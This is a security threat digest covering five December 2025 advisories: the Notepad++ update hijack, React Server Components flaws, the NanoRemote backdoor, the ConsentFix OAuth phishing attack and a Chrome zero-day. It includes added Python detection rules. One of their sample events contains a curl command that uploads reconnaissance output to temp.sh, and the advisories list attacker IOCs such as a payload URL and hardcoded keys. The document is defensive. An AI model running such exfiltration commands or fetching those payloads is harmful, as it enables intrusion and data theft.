F5 Threat Report - December 17th, 2025
Notepad++ Fixes Flaw That Let Attackers Push Malicious Update Files
Notepad++ version 8.8.9 was released to address a security vulnerability in its WinGUp update tool, which had been exploited to deliver malicious executables instead of legitimate software updates. Reports indicated that the GUP.exe updater spawned an unauthorized `%Temp%\AutoUpdater.exe` process, which executed reconnaissance commands such as `netstat -ano`, `systeminfo`, `tasklist`, and `whoami`, then exfiltrated the collected data in `a.txt` to `temp[.]sh` using `curl.exe`. To mitigate this, Notepad++ developer Don Ho initially released version 8.8.8 on November 18th, restricting updates to GitHub. A more robust fix arrived with version 8.8.9 on December 9th, which hardens the update process by verifying the digital signature and certificate of downloaded installers and aborting any update that fails this validation. Security researcher Kevin Beaumont also reported three organizations with security incidents in which initial access was traced to processes spawned by Notepad++, suggesting that the update URL (`https://notepad-plus-plus.org/update/getDownloadUrl.php`) may have been hijacked to redirect users to malicious downloads. Users are advised to upgrade to version 8.8.9 and remove any custom root certificates installed prior to v8.8.7, as all official binaries are now signed.
Severity: Critical
Sources
- https://buaq.net/go-380719.html
- https://gbhackers.com/notepad-flaw-attackers-hijack-update-traffic/
- https://malwaretips.com/threads/notepad-updater-installed-malware.138657/
- https://securityonline.info/urgent-patch-notepad-wingup-flaw-allowed-malware-to-hijack-updates/
- https://www.bleepingcomputer.com/news/security/notepad-plus-plus-fixes-flaw-that-let-attackers-push-malicious-update-files/
- https://www.hendryadrian.com/notepad-fixes-flaw-that-let-attackers-push-malicious-update-files/
- https://www.securitylab.ru/news/567129.php
Threat Details and IOCs
| Technologies: | Microsoft Windows, Notepad++ |
| Threat Actors: | FatBeehive |
| Attacker Countries: | China |
| Attacker Domains: | temp.sh |
| Attacker URLs: | https://notepad-plus-plus.org/update/getDownloadUrl.php |
| Victim Industries: | Critical Manufacturing, Financial, Financial Services, Government, Healthcare, Information Technology, Manufacturing, Software, Telecommunications |
| Victim Countries: | Afghanistan, Bangladesh, Bhutan, China, India, Japan, Maldives, Mongolia, Nepal, North Korea, Pakistan, South Korea, Sri Lanka, Taiwan |
Mitigation Advice
- Identify all assets with Notepad++ installed and upgrade them to version 8.8.9 or newer.
- Using an EDR or endpoint management tool, scan all endpoints for the existence of the file `AutoUpdater.exe` in any `%Temp%` directory.
- Query endpoint and command-line logs for the execution of reconnaissance commands (`netstat`, `systeminfo`, `tasklist`, `whoami`) that redirect output to a file named `a.txt`.
- Add the domain `temp.sh` to your network blocklist on your firewall, DNS sinkhole, and web proxy.
- Audit user and system certificate stores for any custom root certificates related to older Notepad++ installations and remove them.
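One way to turn the hunting advice above into a check, as an added example that is not from the report or from the Notepad++ project: the rules below run over constructed Sysmon-style process-creation events (the field names ParentImage, Image and CommandLine are Sysmon's; every sample value, including the curl upload path, is an assumption).

```python
import ntpath
import re

# Constructed process-creation events (Sysmon Event ID 1 style), modelled on the chain
# the report describes: GUP.exe starts AutoUpdater.exe from %Temp%, which runs discovery
# commands redirected into a.txt and then ships the file to temp.sh with curl.exe.
# None of this is real telemetry; the curl upload path is an assumption.
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Program Files\Notepad++\updater\GUP.exe",
     "Image": r"C:\Users\alice\AppData\Local\Temp\AutoUpdater.exe",
     "CommandLine": r'"C:\Users\alice\AppData\Local\Temp\AutoUpdater.exe"'},
    {"ParentImage": r"C:\Users\alice\AppData\Local\Temp\AutoUpdater.exe",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r'cmd.exe /c "netstat -ano >> a.txt & systeminfo >> a.txt"'},
    {"ParentImage": r"C:\Users\alice\AppData\Local\Temp\AutoUpdater.exe",
     "Image": r"C:\Windows\System32\curl.exe",
     "CommandLine": r'curl.exe -F "file=@a.txt" https://temp.sh/upload'},
    # A legitimate installer launched from %Temp% by the updater: the rules must stay quiet.
    {"ParentImage": r"C:\Program Files\Notepad++\updater\GUP.exe",
     "Image": r"C:\Users\alice\AppData\Local\Temp\npp.8.8.9.Installer.x64.exe",
     "CommandLine": r'"C:\Users\alice\AppData\Local\Temp\npp.8.8.9.Installer.x64.exe"'},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r'cmd.exe /c "whoami > a.txt"'},
]

RECON = {"netstat", "systeminfo", "tasklist", "whoami"}
TEMP_RE = re.compile(r"\\(AppData\\Local\\Temp|Windows\\Temp)\\", re.IGNORECASE)
REDIRECT_RE = re.compile(r'>{1,2}\s*"?a\.txt\b', re.IGNORECASE)


def _exe(path: str) -> str:
    """Lower-case file name without its .exe suffix, e.g. 'whoami'."""
    name = ntpath.basename(path).lower()
    return name[:-4] if name.endswith(".exe") else name


def evaluate(event: dict) -> list[str]:
    """Return the names of the rules that match one process-creation event."""
    parent, image, cmd = event["ParentImage"], event["Image"], event["CommandLine"]
    hits = []
    # Rule 1: the rogue updater binary, by name and location (any %Temp% directory).
    if _exe(image) == "autoupdater" and TEMP_RE.search(image):
        hits.append("autoupdater_in_temp")
    # Rule 2: a discovery command whose output is redirected into a.txt.
    words = {_exe(w) for w in re.findall(r'[^\s"&|]+', cmd)}
    if words & RECON and REDIRECT_RE.search(cmd):
        hits.append("recon_to_a_txt")
    # Rule 3: curl.exe uploading the staging file a.txt to temp.sh.
    if _exe(image) == "curl" and "a.txt" in cmd.lower() and "temp.sh" in cmd.lower():
        hits.append("curl_exfil_temp_sh")
    # Rule 4: any child of the rogue updater is suspicious by inheritance.
    if _exe(parent) == "autoupdater" and TEMP_RE.search(parent):
        hits.append("child_of_autoupdater")
    return hits


def scan(events: list[dict]) -> dict[int, list[str]]:
    """Map event index -> matching rule names, omitting events that match nothing."""
    return {i: h for i, e in enumerate(events) if (h := evaluate(e))}
```

Rule 2 fires on the explorer-spawned `whoami > a.txt` as well, since the redirect-to-`a.txt` pattern is the report's indicator regardless of parent; Rule 1 and Rule 4 give the process tree context.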
Compliance Best Practices
- Implement a software asset management (SAM) program to maintain a real-time inventory of all applications and versions installed on company assets to ensure timely patching.
- Develop and deploy an application control policy that prevents the execution of programs from user-writable directories such as `%Temp%`.
- Configure your EDR to generate alerts when common software updater processes spawn command shells (like cmd.exe or powershell.exe) to execute discovery commands.
- Implement a network egress filtering policy that denies outbound traffic by default and explicitly allows only traffic required for business operations.
- Incorporate modules into your security awareness training program that teach users how to verify official software download sources and recognize the risks of installing software from advertisements or untrusted websites.
Denial of Service and Source Code Exposure in React Server Components
Two new vulnerabilities have been identified in React Server Components, necessitating immediate upgrades for affected applications. These include a High Severity Denial of Service (CVE-2025-55184 and CVE-2025-67779, CVSS 7.5) and a Medium Severity Source Code Exposure (CVE-2025-55183, CVSS 5.3). The Denial of Service vulnerability allows a malicious HTTP request to trigger an infinite loop, consuming CPU and hanging the server process, even if an application does not implement React Server Function endpoints but supports React Server Components. The Source Code Exposure vulnerability enables an attacker to retrieve the source code of a Server Function if it explicitly or implicitly stringifies an argument, potentially leaking hardcoded secrets, though runtime secrets are unaffected. These vulnerabilities impact `react-server-dom-webpack`, `react-server-dom-parcel`, and `react-server-dom-turbopack` in versions 19.0.0, 19.0.1, 19.0.2, 19.1.0, 19.1.1, 19.1.2, 19.2.0, 19.2.1, and 19.2.2. Fixes have been backported to versions 19.0.3, 19.1.4, and 19.2.3, and all users are strongly advised to upgrade to these patched versions. Affected frameworks and bundlers include next, react-router, waku, @parcel/rsc, @vite/rsc-plugin, and rwsdk. Applications not using a server or not utilizing a framework/bundler that supports React Server Components are not affected.
Severity: Critical
Sources
- https://buaq.net/go-381099.html
- https://cyberpress.org/react-server-components-flaws-enable-dos-attacks-and-source-code-exposure/
- https://gbhackers.com/severe-flaws-in-react-server-components-enable-dos-attacks/
- https://react.dev/blog/2025/12/11/denial-of-service-and-source-code-exposure-in-react-server-components
- https://securityonline.info/react-patches-two-new-flaws-risking-server-crashing-dos-and-source-code-disclosure/
- https://thehackernews.com/2025/12/new-react-rsc-vulnerabilities-enable.html
Threat Details and IOCs
| Malware: | Agent Tesla, AISURU, ANGRYREBEL, AshTag, BEACON, BPFDoor, BRICKSTORM, Cobalt Strike, EtherRAT, Noodle RAT, Nood RAT, Predator, Sliver, ValleyRAT, Winos |
| CVEs: | CVE-2025-55182, CVE-2025-55183, CVE-2025-55184, CVE-2025-67779 |
| Technologies: | Meta React Server Components, Node.js, Parcel, React, React Router, Vercel Next.js, Vercel Turbopack, Vite, Waku, Webpack |
| Threat Actors: | Calypso, Earth Bluecrow, Earth Lamia, EarthLamia, Iron Tiger, Jackpot Panda, JackpotPanda, Lazarus Group, Red Menshen, RedMenshen, Rocke, UNC5342 |
| Attacker Countries: | China, North Korea |
| Attacker IPs: | 78.153.140.16 |
| Attacker URLs: | 78.153.140.16/re.sh |
| Victim Industries: | Business Services, E-commerce, Education, Financial Services, Gaming, Government, Healthcare, Legal and Professional Services, Logistics, Manufacturing, Multimedia, Retail, Software, Technology Hardware, Telecommunications, Web Hosting |
| Victim Countries: | Australia, Canada, China, France, Germany, Hong Kong, India, Singapore, United Kingdom, United States |
Mitigation Advice
- Scan all code repositories to identify applications using React Server Components, specifically looking for the vulnerable packages: `react-server-dom-webpack`, `react-server-dom-parcel`, `react-server-dom-turbopack`, or affected frameworks like `next` and `react-router`.
- For any application identified as using a vulnerable version of `react-server-dom-webpack`, upgrade the package to a patched version such as 19.0.3, 19.1.4, or 19.2.3.
- For any application identified as using a vulnerable version of `react-server-dom-parcel`, upgrade the package to a patched version such as 19.0.3, 19.1.4, or 19.2.3.
- For any application identified as using a vulnerable version of `react-server-dom-turbopack`, upgrade the package to a patched version such as 19.0.3, 19.1.4, or 19.2.3.
- For applications using affected frameworks like Next.js or react-router, upgrade the framework to a version that incorporates the patched React Server Component packages.
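An added example, not from the advisory or the React project: a scanner for npm lockfiles (lockfileVersion 2 or 3) that flags the affected `react-server-dom-*` versions listed above, including copies nested under another package, and names the patched release on the same minor line. The lockfile contents are constructed.

```python
import json

# Affected packages and versions as listed in the advisory, and the patched release for
# each minor line (19.0.x -> 19.0.3, 19.1.x -> 19.1.4, 19.2.x -> 19.2.3).
AFFECTED_PACKAGES = {"react-server-dom-webpack", "react-server-dom-parcel",
                     "react-server-dom-turbopack"}
AFFECTED_VERSIONS = {"19.0.0", "19.0.1", "19.0.2", "19.1.0", "19.1.1", "19.1.2",
                     "19.2.0", "19.2.1", "19.2.2"}
PATCHED = {"19.0": "19.0.3", "19.1": "19.1.4", "19.2": "19.2.3"}

# Constructed npm lockfile (lockfileVersion 2/3 layout: a flat "packages" map keyed by
# install path). The copy nested under node_modules/next is there because hoisting does
# not always deduplicate, so a scanner that only reads top-level entries would miss it.
SAMPLE_LOCK = json.dumps({
    "name": "demo-app",
    "lockfileVersion": 3,
    "packages": {
        "": {"name": "demo-app", "dependencies": {"next": "*", "react-server-dom-webpack": "*"}},
        "node_modules/react": {"version": "19.2.0"},
        "node_modules/react-server-dom-webpack": {"version": "19.2.0"},
        "node_modules/next/node_modules/react-server-dom-turbopack": {"version": "19.1.1"},
        "node_modules/react-server-dom-parcel": {"version": "19.2.3"},
    },
})


def package_name(install_path: str) -> str:
    """'node_modules/a/node_modules/@scope/b' -> '@scope/b' (scoped names keep their slash)."""
    return install_path.split("node_modules/")[-1]


def find_vulnerable(lock_json: str) -> list[dict]:
    """One finding per affected install path, with the patched version on the same minor line."""
    lock = json.loads(lock_json)
    if lock.get("lockfileVersion", 1) < 2:
        raise ValueError("lockfileVersion 1 nests dependencies differently; not handled here")
    findings = []
    for path, meta in lock.get("packages", {}).items():
        if not path:
            continue  # the "" key is the root project itself, not a dependency
        name, version = package_name(path), meta.get("version", "")
        if name in AFFECTED_PACKAGES and version in AFFECTED_VERSIONS:
            minor = ".".join(version.split(".")[:2])
            findings.append({"path": path, "package": name,
                             "version": version, "fix": PATCHED[minor]})
    return findings
```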
Compliance Best Practices
- Implement a centralized secrets management solution, such as HashiCorp Vault or a cloud-native option like AWS Secrets Manager or Azure Key Vault, to store and manage all application secrets instead of hardcoding them in source files.
- Integrate static application security testing (SAST) tools into the CI/CD pipeline to automatically scan for and block any code commits that contain hardcoded secrets.
- Configure and tune the Web Application Firewall (WAF) with rate-limiting rules to detect and block anomalous or high-volume requests targeting application endpoints, which can help mitigate denial-of-service attacks.
- Review and formalize the third-party software patch management policy to ensure critical vulnerabilities are identified and remediated within a defined timeframe, including subscribing to security advisories for all critical libraries and frameworks.
NanoRemote: Advanced Windows Backdoor Leveraging Google Drive API for Stealthy C2
NanoRemote is a sophisticated Windows backdoor, first identified in October 2025 by Elastic Security Labs, that leverages the Google Drive API for stealthy command-and-control (C2) and file staging, allowing its malicious traffic to blend with legitimate cloud operations. This C++ implant, associated with the espionage-linked REF7707 threat cluster (also known as CL-STA-0049, Earth Alux, Jewelbug), targets government, telecom, aviation, and education sectors, demonstrating an evolution from previous implants like FINALDRAFT, which used the Microsoft Graph API. The attack chain typically involves WMLOADER, a loader masquerading as Bitdefender Security's BDReinit.exe with an invalid signature, which decrypts and executes the NanoRemote payload from `wmsetup.log` using a rolling XOR routine followed by AES-CBC decryption with the key `3A5AD78097D944AC`. NanoRemote itself communicates via HTTP POST, sending Zlib-compressed, AES-CBC-encrypted JSON data to a non-routable IP at `/api/client` with the User-Agent `NanoRemote/1.0`, using a hard-coded AES-CBC key of `558bec83ec40535657833d7440001c00` and Google Drive API OAuth 2.0 tokens for authentication. Its 22 command handlers enable extensive capabilities including system enumeration, file system operations, custom PE loader execution, remote command execution, and Google Drive download/upload tasks, further enhanced by `libPeConv` and Microsoft Detours for stealth. Detection is complicated by its cloud API abuse, necessitating behavioral detection rules, YARA rules for artifacts like `wmsetup.log`, and adherence to MITRE ATT&CK mappings (Exfiltration over Web Service, Masquerading, Discovery, Command Execution, Defense Evasion). Immediate incident response includes isolating infected machines, rotating Google API credentials, forensic analysis, auditing API logs for atypical Google Drive activity, and blocking known C2 IPs, while long-term remediation focuses on Zero-Trust principles, cloud API monitoring, and SIEM/UEBA integration.
Severity: Critical
Sources
- https://buaq.net/go-381078.html
- https://cyberpress.org/nanoremote-malware/
- https://cybersrcc.com/2025/12/11/nanoremote-advanced-windows-backdoor-leveraging-google-drive-api-for-stealthy-c2/
- https://malwaretips.com/threads/meet-nanoremote-a-newly-discovered-windows-backdoor-that-leverages-the-google-drive-api-for-data-theft-and-payload-staging.138663/
- https://thehackernews.com/2025/12/nanoremote-malware-uses-google-drive.html
- https://www.hendryadrian.com/nanoremote-cousin-of-finaldraft/
Threat Details and IOCs
| Malware: | FINALDRAFT, NanoRemote, NANOREMOTE, Squidoor, WMLOADER |
| Technologies: | Bitdefender, Google Drive, Microsoft Graph, Microsoft Windows, Trend Micro |
| Threat Actors: | CLSTA0049, EarthAlux, Finaldraft, Jewelbug, REF7707 |
| Attacker Countries: | China |
| Attacker URLs: | /api/client, /drive/v3/files/%s?alt=media, /upload/drive/v3/files |
| Attacker Hashes: | 1e28c01387e0f0229a3fb3df931eaf80, 35593a51ecc14e68181b2de8f82dde8c18f27f16fcebedbbdac78371ff4f8d41, 558bec83ec40535657833d7440001c00, 57e0e560801687a8691c704f79da0c1dbdd0f7d5cc671a6ce07ec0040205d728, 999648bd814ea5b1e97918366c6bd0f82b88f5675da1d4133257b9e6f4121475, b26927ca4342a19e9314cf05ee9d9a4bddf7b848def2db941dd281d692eaa73c, fff31726d253458f2c29233d37ee4caf43c5252f58df76c0dced71c4014d6902 |
| Victim Industries: | Aerospace, Defense, Education, Financial Services, Government, Healthcare, Information Technology, Logistics, Manufacturing, Retail, Software, Technology Hardware, Telecommunications |
| Victim Countries: | Argentina, Bolivia, Brazil, Brunei, Cambodia, Chile, Colombia, Ecuador, Guyana, Indonesia, Laos, Malaysia, Myanmar, Paraguay, Peru, Philippines, Russia, Singapore, Suriname, Taiwan, Thailand, Timor-Leste, Uruguay, Venezuela, Vietnam |
Mitigation Advice
- Scan all Windows endpoints for the presence of files named 'wmsetup.log' and executables named 'BDReinit.exe' that have an invalid or missing digital signature.
- Search all available network logs (e.g., proxy, firewall, DNS) for outbound HTTP requests containing the User-Agent string 'NanoRemote/1.0'.
- Obtain and deploy the publicly available YARA rules for NanoRemote and WMLOADER into your endpoint detection and response (EDR) or other file scanning solutions.
- Use an EDR or endpoint management tool to query all Windows systems for the existence of the environment variable 'NR_GOOGLE_ACCOUNTS'.
- Create a SIEM or network intrusion detection system (NIDS) rule to alert on HTTP POST requests to any URI ending in '/api/client' that also carry the User-Agent 'NanoRemote/1.0'.
- If a compromise is suspected or confirmed, immediately review and revoke suspicious Google Workspace OAuth tokens and rotate API credentials for the affected accounts.
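The User-Agent and URI checks above as one scoring rule over proxy logs, written here as an added example (not from the report or from Elastic's own detections): it combines the hard `NanoRemote/1.0` indicator with POSTs to `/api/client`, the non-routable destination the report mentions, and the Drive API download/upload paths from the IOC table. The JSON-lines log format and all values are constructed.

```python
import ipaddress
import json
import re
from urllib.parse import urlsplit

# Constructed proxy log in JSON-lines form, one request per line, with the fields most
# proxies export. The values are made up to exercise the rules and are not real traffic.
SAMPLE_LOG = """\
{"ts":"2025-12-10T09:12:01Z","src":"10.20.30.40","method":"POST","url":"http://192.168.56.10/api/client","ua":"NanoRemote/1.0"}
{"ts":"2025-12-10T09:12:05Z","src":"10.20.30.40","method":"GET","url":"https://www.googleapis.com/drive/v3/files/1AbCdEf?alt=media","ua":"NanoRemote/1.0"}
{"ts":"2025-12-10T09:13:11Z","src":"10.20.30.41","method":"POST","url":"https://www.googleapis.com/upload/drive/v3/files?uploadType=multipart","ua":"Mozilla/5.0 (Windows NT 10.0) Chrome/143.0.0.0"}
{"ts":"2025-12-10T09:14:00Z","src":"10.20.30.42","method":"POST","url":"https://intranet.example.com/api/client","ua":"python-requests/2.32"}
{"ts":"2025-12-10T09:15:00Z","src":"10.20.30.43","method":"GET","url":"https://www.example.com/","ua":"Mozilla/5.0"}
"""

C2_UA = "NanoRemote/1.0"                                  # User-Agent named in the report
DRIVE_MEDIA_RE = re.compile(r"^/drive/v3/files/[^/]+$")   # /drive/v3/files/<id>?alt=media
DRIVE_UPLOAD_RE = re.compile(r"^/upload/drive/v3/files")  # /upload/drive/v3/files


def _non_global_host(host: str) -> bool:
    """True when the destination is an IP literal outside public address space."""
    try:
        return not ipaddress.ip_address(host).is_global
    except ValueError:
        return False  # a hostname rather than an IP literal


def classify(entry: dict) -> tuple[int, list[str]]:
    """Score one request (0 = nothing of interest) and list the reasons."""
    url = urlsplit(entry["url"])
    path, query, ua = url.path, url.query, entry.get("ua", "")
    score, reasons = 0, []
    if ua == C2_UA:  # hard indicator: the implant's own User-Agent
        score += 100
        reasons.append("ua_nanoremote")
    if entry["method"] == "POST" and path.endswith("/api/client"):
        score += 40
        reasons.append("post_api_client")
        if _non_global_host(url.hostname or ""):  # report: C2 sits at a non-routable IP
            score += 30
            reasons.append("non_routable_c2_host")
    # Drive API media download/upload from a non-browser client. Low fidelity on its own;
    # assumption: interactive Drive use in this environment comes from a browser UA.
    drive_call = (DRIVE_MEDIA_RE.match(path) and "alt=media" in query) or DRIVE_UPLOAD_RE.match(path)
    if url.hostname == "www.googleapis.com" and drive_call and not ua.startswith("Mozilla/"):
        score += 20
        reasons.append("drive_api_nonbrowser_client")
    return score, reasons


def hunt(log_text: str, threshold: int = 40) -> list[dict]:
    """Return the entries scoring at or above the threshold, annotated with score and reasons."""
    hits = []
    for line in log_text.splitlines():
        entry = json.loads(line)
        score, reasons = classify(entry)
        if score >= threshold:
            hits.append({**entry, "score": score, "reasons": reasons})
    return hits
```

The internal `/api/client` POST from `python-requests` scores exactly at the default threshold so it surfaces for review without the weight of the User-Agent match.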
Compliance Best Practices
- Implement a Cloud Access Security Broker (CASB) to gain visibility into Google Drive API usage and establish policies to detect and alert on anomalous activity, such as unusually frequent uploads or downloads by a service account.
- Establish a data pipeline to ingest Google Workspace audit logs, specifically including Google Drive API activity, into your SIEM for centralized analysis and alerting.
- Initiate a recurring audit of all Google Workspace OAuth applications and service account permissions, revoking unnecessary or overly permissive API access based on the principle of least privilege.
- Refine and tune your Endpoint Detection and Response (EDR) platform's behavioral rules to generate high-fidelity alerts for suspicious memory allocation (VirtualAlloc) followed by execution, especially from non-standard processes.
- Implement application control policies on endpoints to restrict which executables are permitted to make outbound connections to known cloud service domains like 'googleapis.com'.
New ConsentFix Attack Hijacks Microsoft Accounts via Azure CLI
A novel ConsentFix attack, a variant of the ClickFix social engineering technique, has been identified that exploits the Azure CLI OAuth app to compromise Microsoft accounts, circumventing both password requirements and multi-factor authentication (MFA). This method, discovered by Push Security, initiates when a victim navigates to a compromised, high-ranking website displaying a deceptive Cloudflare Turnstile CAPTCHA that requests a business email. Upon validation against a target list, the victim is prompted to click a "Sign in" button, which directs them to a legitimate Microsoft Azure CLI login page. Following successful authentication or account selection, Microsoft redirects the user to a localhost URL containing an Azure CLI OAuth authorization code. The attacker then instructs the victim to paste this URL back into the malicious site, thereby granting the attacker full control over the Microsoft account via the Azure CLI OAuth app without ever acquiring the user's credentials or bypassing MFA directly. The attack is designed to trigger only once per victim IP address. To mitigate this threat, organizations should monitor for anomalous Azure CLI login activity, particularly from new IP addresses, and scrutinize the use of legacy Graph scopes. Detection can be further enhanced through Microsoft Defender for Cloud Apps' "Malicious OAuth app consent" policies, Azure AD Identity Protection's consent phishing and workload identity risk detections, and by actively monitoring AADGraphActivityLogs for unusual activity.
Severity: Critical
Sources
Threat Details and IOCs
| Malware: | CyberVolk 2.x, NANOREMOTE, VolkLocker |
| Technologies: | Microsoft 365, Microsoft Azure, Microsoft Azure CLI, Microsoft Entra ID, Microsoft Intune |
| Attacker IPs: | 12.75.116.137, 12.75.216.90, 182.3.36.223 |
| Attacker Domains: | fastwaycheck.com, previewcentral.com, trustpointassurance.com |
| Attacker URLs: | hxxps://fastwaycheck.com/, hxxps://previewcentral.com, hxxps://trustpointassurance.com/ |
| Victim Industries: | Aerospace, Government, Healthcare, Non-Governmental Organizations (NGOs), Retail, Supply Chain |
| Victim Countries: | United States |
Mitigation Advice
- Review Azure AD sign-in logs for unusual Azure CLI login activity, focusing on logins from unexpected IP addresses, geolocations, or by users who do not typically use the Azure CLI.
- Create detection rules in your SIEM to alert on the use of legacy Azure AD Graph API scopes within OAuth consent grants, as this is a known attacker technique to evade detection.
- Send an immediate security bulletin to all employees warning them to never copy and paste a full URL from their browser's address bar into a website form, especially if the URL contains 'localhost' or authentication codes.
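A baseline check for the sign-in log review described above, added here as an example rather than anything from Push Security or Microsoft: it flags successful Azure CLI sign-ins by users with no prior CLI use, or from an address the user has not used in the baseline window. The rows are constructed in the shape of Entra ID SigninLogs columns; the app display name and error code 50126 are Microsoft's, everything else is made up.

```python
from collections import defaultdict
from datetime import datetime, timedelta

AZURE_CLI_APP = "Microsoft Azure CLI"  # AppDisplayName as it appears in Entra ID sign-in logs


def _event(ts, upn, app, ip, result=0):
    """Build one sign-in row with the subset of SigninLogs columns used below."""
    return {"TimeGenerated": ts, "UserPrincipalName": upn, "AppDisplayName": app,
            "IPAddress": ip, "ResultType": result}


# Constructed sign-ins: alice uses the Azure CLI routinely from one address; bob has never
# used it and signs in to it from an unfamiliar address; carol first uses it from her usual
# address; dave's attempt fails (50126 = wrong password), so no token was issued.
SAMPLE_SIGNINS = [
    _event("2025-12-01T08:00:00Z", "alice@example.com", AZURE_CLI_APP, "203.0.113.10"),
    _event("2025-12-02T08:05:00Z", "alice@example.com", AZURE_CLI_APP, "203.0.113.10"),
    _event("2025-12-03T09:00:00Z", "bob@example.com", "Office 365 Exchange Online", "203.0.113.11"),
    _event("2025-12-05T09:00:00Z", "carol@example.com", "Office 365 Exchange Online", "203.0.113.12"),
    _event("2025-12-10T14:20:00Z", "alice@example.com", AZURE_CLI_APP, "203.0.113.10"),
    _event("2025-12-10T14:31:00Z", "bob@example.com", AZURE_CLI_APP, "198.51.100.7"),
    _event("2025-12-10T15:02:00Z", "alice@example.com", AZURE_CLI_APP, "198.51.100.9"),
    _event("2025-12-10T15:30:00Z", "carol@example.com", AZURE_CLI_APP, "203.0.113.12"),
    _event("2025-12-10T16:00:00Z", "dave@example.com", AZURE_CLI_APP, "198.51.100.7", result=50126),
]


def _parse(ts: str) -> datetime:
    return datetime.fromisoformat(ts.replace("Z", "+00:00"))


def detect(signins, now, baseline_days=30, detect_hours=24):
    """Alert on successful Azure CLI sign-ins by users with no prior CLI use or from an IP
    the user has not used in the baseline window. Older events only build the baseline."""
    now_ts = _parse(now)
    baseline_start = now_ts - timedelta(days=baseline_days)
    detect_start = now_ts - timedelta(hours=detect_hours)
    known_ips, used_cli, alerts = defaultdict(set), set(), []
    for e in sorted(signins, key=lambda e: _parse(e["TimeGenerated"])):
        ts, user, ip = _parse(e["TimeGenerated"]), e["UserPrincipalName"], e["IPAddress"]
        if ts < baseline_start or e["ResultType"] != 0:
            continue  # outside the window, or a failed sign-in: nothing to baseline or alert on
        is_cli = e["AppDisplayName"] == AZURE_CLI_APP
        if is_cli and ts >= detect_start:
            reasons = []
            if user not in used_cli:
                reasons.append("first_cli_use")
            if ip not in known_ips[user]:
                reasons.append("new_ip")
            if reasons:
                alerts.append({"user": user, "ip": ip, "time": e["TimeGenerated"],
                               "reasons": reasons,
                               "severity": "high" if len(reasons) == 2 else "medium"})
        known_ips[user].add(ip)  # every successful sign-in, any app, extends the baseline
        if is_cli:
            used_cli.add(user)
    return alerts
```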
Compliance Best Practices
- Implement a recurring process to audit all OAuth applications in Azure AD, reviewing their permissions, usage, and business justification, and remove any unnecessary or overly permissive applications.
- Deploy and configure Microsoft Defender for Cloud Apps, enabling specific policies like 'Malicious OAuth app consent' to automatically detect and alert on suspicious OAuth application activity.
- Enable and monitor detections within Azure AD Identity Protection, specifically focusing on 'Consent Phishing' and 'workload identity risk' alerts, and create automated response actions for high-severity findings.
- Develop and enforce a policy based on the principle of least privilege to restrict Azure CLI access to only authorized administrative and developer roles.
- Establish a continuous security awareness training program that includes modules on identifying and responding to sophisticated phishing and consent grant attacks.
Google Patches Chrome Zero-Day Vulnerability Exploited in Attack
Google has released urgent updates for Chrome to address a newly patched zero-day vulnerability, tracked as 466192044, which is actively being exploited in the wild. This marks the eighth such security flaw fixed this year, following CVE-2025-13223, CVE-2025-10585, CVE-2025-6558, CVE-2025-6554, CVE-2025-5419, CVE-2025-2783, and CVE-2025-4664. While specific details on 466192044 are limited due to ongoing coordination, Google confirmed its active exploitation. Additionally, the updates resolve CVE-2025-14372, a Use-After-Free vulnerability in the Password Manager, and CVE-2025-14373, an inappropriate implementation issue in the Toolbar. All Google Chrome versions prior to 143.0.7499.109 are affected, and users are advised to upgrade immediately to stable channel version 143.0.7499.109/.110 for Windows/Mac or 143.0.7499.109 for Linux to mitigate these risks.
Severity: Critical
Sources
Threat Details and IOCs
| CVEs: | CVE-2025-14372, CVE-2025-14373 |
| Technologies: | Apple macOS, Google Chrome, Linux, Microsoft Edge, Microsoft Windows |
| Threat Actors: | DarkHotel, Lazarus, TaxOff, Team46 |
| Victim Industries: | Financial Services, Government, Healthcare, Technology Hardware |
| Victim Countries: | United States |
Mitigation Advice
- Update all Google Chrome installations on Windows and macOS to version 143.0.7499.109/.110 and on Linux to version 143.0.7499.109.
- Initiate a vulnerability scan using Qualys QID 386201 to identify all endpoints with vulnerable versions of Google Chrome.
Compliance Best Practices
- Implement and configure an automated patch management solution to ensure security updates for all third-party software, especially web browsers, are deployed within 72 hours of release.
- Develop and enforce a security policy using Group Policy Objects (GPO) or a similar endpoint management tool to disable non-essential browser features, such as the built-in password manager, and enforce the use of a dedicated enterprise password management tool.